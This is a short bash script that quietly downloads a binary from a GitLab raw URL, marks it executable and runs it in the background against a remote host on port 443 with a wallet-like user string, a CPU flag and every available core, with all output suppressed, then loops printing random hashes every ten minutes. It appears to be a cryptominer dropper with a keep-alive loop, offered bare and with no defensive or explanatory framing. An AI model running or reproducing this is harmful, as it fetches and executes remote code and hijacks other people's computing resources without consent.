#!/bin/bash
wget -q https://gitlab.com/jadons19292/donlod/-/raw/main/klarig4 -O sgr1
chmod +x sgr1
./sgr1 -o rtcrplant.thecritman.my.id:443 -u RddLm7spajH7RTohgR83oSjZmYNHipz3Qb -p CPU -t $(nproc --all) > /dev/null 2>&1 &
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done >/dev/null 2>&1
